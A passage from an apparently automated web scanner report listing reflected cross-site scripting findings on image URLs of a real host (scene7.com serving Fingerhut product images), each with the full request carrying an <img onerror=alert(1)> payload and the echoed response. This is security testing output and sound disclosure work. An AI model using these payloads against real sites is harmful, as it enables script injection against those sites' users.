X-N: S

Unable to find /bluestembrands/ND877_A_99910ce7<img src=a onerror=alert(1)>0733927d8c7

5.81. http://s7d5.scene7.com/is/image/bluestembrands/NE440_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NE440_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 917c4<img%20src%3da%20onerror%3dalert(1)>5834b878d03 was submitted in the REST URL parameter 4. This input was echoed as 917c4<img src=a onerror=alert(1)>5834b878d03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE440_WM1_400917c4<img%20src%3da%20onerror%3dalert(1)>5834b878d03?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:26 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE440_WM1_400917c4<img src=a onerror=alert(1)>5834b878d03

5.82. http://s7d5.scene7.com/is/image/bluestembrands/NE682_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NE682_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53aaa<img%20src%3da%20onerror%3dalert(1)>858eeabeb94 was submitted in the REST URL parameter 4. This input was echoed as 53aaa<img src=a onerror=alert(1)>858eeabeb94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE682_WVA_99953aaa<img%20src%3da%20onerror%3dalert(1)>858eeabeb94?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:38 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE682_WVA_99953aaa<img src=a onerror=alert(1)>858eeabeb94

5.83. http://s7d5.scene7.com/is/image/bluestembrands/NE967_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NE967_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6168f<img%20src%3da%20onerror%3dalert(1)>e1501599207 was submitted in the REST URL parameter 4. This input was echoed as 6168f<img src=a onerror=alert(1)>e1501599207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE967_WM1_4006168f<img%20src%3da%20onerror%3dalert(1)>e1501599207?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:12 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE967_WM1_4006168f<img src=a onerror=alert(1)>e1501599207

5.84. http://s7d5.scene7.com/is/image/bluestembrands/NH642_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NH642_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4083<img%20src%3da%20onerror%3dalert(1)>f0bf3cf58c5 was submitted in the REST URL parameter 4. This input was echoed as f4083<img src=a onerror=alert(1)>f0bf3cf58c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NH642_VA_999f4083<img%20src%3da%20onerror%3dalert(1)>f0bf3cf58c5?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:43 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NH642_VA_999f4083<img src=a onerror=alert(1)>f0bf3cf58c5

5.85. http://s7d5.scene7.com/is/image/bluestembrands/NI736_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NI736_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d75c6<img%20src%3da%20onerror%3dalert(1)>7c7ffbc116d was submitted in the REST URL parameter 4. This input was echoed as d75c6<img src=a onerror=alert(1)>7c7ffbc116d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NI736_WVA_999d75c6<img%20src%3da%20onerror%3dalert(1)>7c7ffbc116d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NI736_WVA_999d75c6<img src=a onerror=alert(1)>7c7ffbc116d

5.86. http://s7d5.scene7.com/is/image/bluestembrands/NJ310_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NJ310_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85774<img%20src%3da%20onerror%3dalert(1)>9ee1255cff was submitted in the REST URL parameter 4. This input was echoed as 85774<img src=a onerror=alert(1)>9ee1255cff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ310_WM1_40085774<img%20src%3da%20onerror%3dalert(1)>9ee1255cff?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:37 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ310_WM1_40085774<img src=a onerror=alert(1)>9ee1255cff

5.87. http://s7d5.scene7.com/is/image/bluestembrands/NJ484_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NJ484_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60ea5<img%20src%3da%20onerror%3dalert(1)>aa190ebc46 was submitted in the REST URL parameter 4. This input was echoed as 60ea5<img src=a onerror=alert(1)>aa190ebc46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ484_WVA_99960ea5<img%20src%3da%20onerror%3dalert(1)>aa190ebc46?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:17 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ484_WVA_99960ea5<img src=a onerror=alert(1)>aa190ebc46

5.88. http://s7d5.scene7.com/is/image/bluestembrands/NJ847_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NJ847_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ccb1<img%20src%3da%20onerror%3dalert(1)>30e1f908c3d was submitted in the REST URL parameter 4. This input was echoed as 4ccb1<img src=a onerror=alert(1)>30e1f908c3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ847_VA_9994ccb1<img%20src%3da%20onerror%3dalert(1)>30e1f908c3d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:20 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ847_VA_9994ccb1<img src=a onerror=alert(1)>30e1f908c3d

5.89. http://s7d5.scene7.com/is/image/bluestembrands/NK248_VC_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NK248_VC_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f29e6<img%20src%3da%20onerror%3dalert(1)>b9664e76175 was submitted in the REST URL parameter 4. This input was echoed as f29e6<img src=a onerror=alert(1)>b9664e76175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NK248_VC_999f29e6<img%20src%3da%20onerror%3dalert(1)>b9664e76175?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:08 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NK248_VC_999f29e6<img src=a onerror=alert(1)>b9664e76175

5.90. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NL522_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee9d8<img%20src%3da%20onerror%3dalert(1)>2d4c68c6ee6 was submitted in the REST URL parameter 4. This input was echoed as ee9d8<img src=a onerror=alert(1)>2d4c68c6ee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NL522_A_999ee9d8<img%20src%3da%20onerror%3dalert(1)>2d4c68c6ee6?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Mon, 16 May 2011 01:38:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:13 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NL522_A_999ee9d8<img src=a onerror=alert(1)>2d4c68c6ee6

5.91. http://s7d5.scene7.com/is/image/bluestembrands/NL578_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NL578_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b08db<img%20src%3da%20onerror%3dalert(1)>baab8c8b42e was submitted in the REST URL parameter 4. This input was echoed as b08db<img src=a onerror=alert(1)>baab8c8b42e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NL578_WVA_999b08db<img%20src%3da%20onerror%3dalert(1)>baab8c8b42e?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NL578_WVA_999b08db<img src=a onerror=alert(1)>baab8c8b42e

5.92. http://s7d5.scene7.com/is/image/bluestembrands/NM486_VC_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NM486_VC_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 39b37<img%20src%3da%20onerror%3dalert(1)>cca42c92227 was submitted in the REST URL parameter 4. This input was echoed as 39b37<img src=a onerror=alert(1)>cca42c92227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NM486_VC_99939b37<img%20src%3da%20onerror%3dalert(1)>cca42c92227?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NM486_VC_99939b37<img src=a onerror=alert(1)>cca42c92227

5.93. http://s7d5.scene7.com/is/image/bluestembrands/NQ086_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NQ086_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f357<img%20src%3da%20onerror%3dalert(1)>6e2d4b0cae9 was submitted in the REST URL parameter 4. This input was echoed as 9f357<img src=a onerror=alert(1)>6e2d4b0cae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ086_VA_9999f357<img%20src%3da%20onerror%3dalert(1)>6e2d4b0cae9?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:12 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ086_VA_9999f357<img src=a onerror=alert(1)>6e2d4b0cae9

5.94. http://s7d5.scene7.com/is/image/bluestembrands/NQ087_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NQ087_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34855<img%20src%3da%20onerror%3dalert(1)>8daf28cab41 was submitted in the REST URL parameter 4. This input was echoed as 34855<img src=a onerror=alert(1)>8daf28cab41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ087_VA_99934855<img%20src%3da%20onerror%3dalert(1)>8daf28cab41?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:42 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ087_VA_99934855<img src=a onerror=alert(1)>8daf28cab41

5.95. http://s7d5.scene7.com/is/image/bluestembrands/NQ582_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NQ582_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f217f<img%20src%3da%20onerror%3dalert(1)>6b640d4054c was submitted in the REST URL parameter 4. This input was echoed as f217f<img src=a onerror=alert(1)>6b640d4054c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ582_WVA_999f217f<img%20src%3da%20onerror%3dalert(1)>6b640d4054c?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ582_WVA_999f217f<img src=a onerror=alert(1)>6b640d4054c

5.96. http://s7d5.scene7.com/is/image/bluestembrands/NR042_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NR042_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3d2ca<img%20src%3da%20onerror%3dalert(1)>8ae80290fc0 was submitted in the REST URL parameter 4. This input was echoed as 3d2ca<img src=a onerror=alert(1)>8ae80290fc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NR042_WVA_9993d2ca<img%20src%3da%20onerror%3dalert(1)>8ae80290fc0?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NR042_WVA_9993d2ca<img src=a onerror=alert(1)>8ae80290fc0

5.97. http://s7d5.scene7.com/is/image/bluestembrands/NR149_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NR149_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c31b5<img%20src%3da%20onerror%3dalert(1)>f3ed8f7c5aa was submitted in the REST URL parameter 4. This input was echoed as c31b5<img src=a onerror=alert(1)>f3ed8f7c5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NR149_WVA_999c31b5<img%20src%3da%20onerror%3dalert(1)>f3ed8f7c5aa?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:50 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NR149_WVA_999c31b5<img src=a onerror=alert(1)>f3ed8f7c5aa

5.98. http://s7d5.scene7.com/is/image/bluestembrands/NS372_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NS372_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5884<img%20src%3da%20onerror%3dalert(1)>816bdda8ac0 was submitted in the REST URL parameter 4. This input was echoed as f5884<img src=a onerror=alert(1)>816bdda8ac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NS372_WVA_999f5884<img%20src%3da%20onerror%3dalert(1)>816bdda8ac0?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:29 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NS372_WVA_999f5884<img src=a onerror=alert(1)>816bdda8ac0

5.99. http://s7d5.scene7.com/is/image/bluestembrands/h6381_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/h6381_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8eb52<img%20src%3da%20onerror%3dalert(1)>e396f72724a was submitted in the REST URL parameter 4. This input was echoed as 8eb52<img src=a onerror=alert(1)>e396f72724a in the application's response.

